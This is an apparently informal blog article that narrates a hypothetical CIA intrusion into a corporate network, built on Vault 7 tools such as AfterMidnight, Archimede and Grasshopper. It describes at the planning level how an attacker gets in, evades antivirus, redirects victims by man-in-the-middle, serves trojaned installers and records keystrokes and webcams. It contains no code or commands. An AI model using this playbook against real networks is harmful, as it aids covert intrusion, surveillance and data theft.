What CIA does on target’s Local Area Network
Based on Wikileaks Vault 7 leak of CIA tools and documents, we can imagine what a data exfiltration attack to a corporate network by CIA looks like. I’m going to focus on the Local Network activity so let’s say there is already a compromised computer in the LAN that will be used as a pivot to further exploit the target organization. That part could’ve been done by some employee visiting CIA’s exploitation server that utilizes browser 0days or by opening a maliciously crafted document exploiting reader vulnerabilities. Even if that fails, agent could hack the router (RCE Proof-Of-Concept for over 300 Cisco models, based on Vault 7 leak) or attack the WiFi to get himself an entry into the LAN.
The arsenal is made of many building blocks to allow agents to create the perfect tool for the job, without unnecessary parts. When computer is first compromised, only core backdoor functionality is planted. Only when certain action is required, it is received to process memory just in time, executed and forgotten. This way, malicious code never touches the disk and doesn’t persist on target’s machine which helps a lot with antivirus and makes it very difficult to reverse engineer the program. I will first describe the main building blocks our fictional attack will rely on. These tools would vary based on target operating system, but the applied principles would be the same.
That Core backdoor thingy that waits for payload is dubbed AfterMidnight and those payloads are called Gremlins. Let’s say that controlled machine in target LAN has AfterMidnight.dll and AfterMidnight Core on disk. Follow the diagram below as you read about this tool.
DLL is in plain text and looks as innocent as possible. It persists as Windows Service DLL running from inside the netsvcs svchost.exe process. This stager finds AfterMidnight Core on disk and loads it into memory.
Core handles the encrypted networking part and behaves strongly on the customized configuration which defines where and how often to report to Command & Control server (Octopus). That server can be hosted as a real WAN server or even as another Gremlin on another machine.
First thing Core expects is the Master Gremlin which is actually procedure plan with the encryption key. Note that encryption key never touches the disk and in most cases (including our case), neither does the Master Gremlin.
When the predefined time comes, Master first downloads any needed Gremlins and stores them on the disk encrypted with the mentioned key. Now everything is ready and plan begins. Gremlins are loaded into memory as-needed according to the plan. It is impossible to retroactively find out what action was carried out because the encryption is so carefully carried out and everything is deleted after it’s no longer required, just in case.
Following diagram shows it clearly:
AfterMidnight is the program that is controlling the pivot and the program to be installed on target machine in this fictional mission. We owned 1 computer with it and we can load another weapon as a Gremlin compromise the target.
Archimede, new version of Fulcrum, is a tool which facilitates a controlled machine to pivot through LAN. The application will monitor the target machine’s HTTP traffic and redirect the target to the provided URL when the proper conditions are met. This is not an exploit or payload, but a simply a Man in the Middle tool which makes sure that the victim in the same LAN reaches the URL of attacker’s choice. The setup of these tools is the same, but Archimede support iframe injection which might be useful if shorter paths are blocked.
The framework for creating highly customized payloads for Windows machines – Grasshopper. This tool provides the ability to create the perfect Master Gremlin and Gremlins based on the information gathered. Grasshopper allegedly shines when it comes to adjusting to the personal security products which Windows users tend to have installed.
Both AfterMidnight and Grasshopper use Python 3.4 interpreter and everything seems compatible with each other. I really like the concept of building specialized weapons that come and go, without footprint.
Now you’re introduced to our payload (AfterMidnight) pretty well and the attack vector tool (Archimede) and the rest will be described as we go.
Fun starts here
We have the pivot machine and I’m thinking about loading Archimede as a Gremlin to start a Man in the Middle attack. Archimede manual clearly allows creating DLL payload with predefined parameters which can be used as a Gremlin. Let’s prepare it (here it says Fulcrum, but it’s probably the same in Archimede).
So you are just itching to use Fulcrum against this target of yours and you’re ready to dive in! Hang on there partner. First we need to gather the following information before we can build a deployment package:
1. The MAC address of the LANside interface of the gateway
2. The MAC address of the target machine
3. The URL to inject into the HTTP response
4. The Injection method of the HTTP response
5. The character set of the pivot machine
6. Any user agent string whitelist entries
7. Any user agent string blacklist entries
8. Any target content type modifications
9. Whether the pivot machine is a laptop or a desktop
10. The OS version of the pivot machine
11. The bitness of the process Fulcrum will run in
12. The privilege level of the process Fulcrum will run in
13. What PSPs are present on the pivot machine
14. How the Fulcrum files will be delivered to the pivot machine
15. Where the Fulcrum files will be deployed to on the pivot machine’s file system
16. When Fulcrum should be delivered to the pivot machine
17. How Fulcrum will be started on the pivot machine
18. When Fulcrum should be started
19. If Fulcrum should be automatically restarted
20. When Fulcrum should be shut down
21. When Fulcrum should be removed
Technical options first: we can use Grasshopper to get a DLL (Gremlin) that finds out technical information. Furthermore, let’s use so called Alpha Gremlin – custom scripting engine that we can use to programmatically find out gateway and target MAC, OS version, bitness, character set and present PSPs. Now we can run basic sniffer and MitM.
We will start immediately, run MitM to gather information about victim’s browser and OS based on their internet traffic. Timing options will be set according to Archimede’s has “Fire and Forget” recommendation – everything except the core will be removed once the mission is done (on pivot). Other options are not needed for the first MitM.
Grasshopper will make sure that we don’t upset pivot’s PSP, which is nice. Other options are not used yet as we need to gather more information, which we will with the basic sniffer and MitM functionality.
This is the point where most of these attacks go other directions, let’s analyze the best and the worst scenario.
Best case scenario, agent has a 0day for some technology used by the target, e.g. person uses vulnerable browser or OS. Agent would configure Archimede to redirect the first HTTP GET request to a server in LAN which is another Gremlin on the pivot. That Gremlin would simply deliver the AfterMidnight Core payload using that exploit.
Worst case scenario, the target is not using any exploitable technology. Also, he configured the browser to block all HTTP traffic.
Global adversaries such as CIA certainly have many legit TLS/SSL certificates which would be used here to make a realistic HTTPS server which will offer AfterMidnight to our victim. We need to exploit the human now, so these methods depend on user interaction. If one social engineering attack fails, we can just try another trick until we succeed.
We would configure new Archimede Gremlin to perform MitM and another Gremlin to serve as HTTPS server. Once Archimede finds ‘download’ in requested URL, it would redirect the target to our Gremlin server that hosts a copy of the requested website with all downloads available, but tampered with AfterMidnight installer. The target will become a victim once they open the downloaded executable. I assume most people don’t check the integrity checksums when downloading over SSL.
Now we destroy everything except AfterMidnight Core on the first pivot and repeat the information gathering with Alpha Gremlin on the new machine. According to the previous step, we load Gremlins for that system and personal security product which will transfer interesting files to the Hive. If needed, we can load Gremlins for recording keyboard, microphone, webcam, screen activity etc.
If you enjoyed reading this, I highly recommend diving into Vault 7, it will keep you entertained for hours. Perhaps take a look at more persistent, kernel level payloads such as those found in Dark Matter section.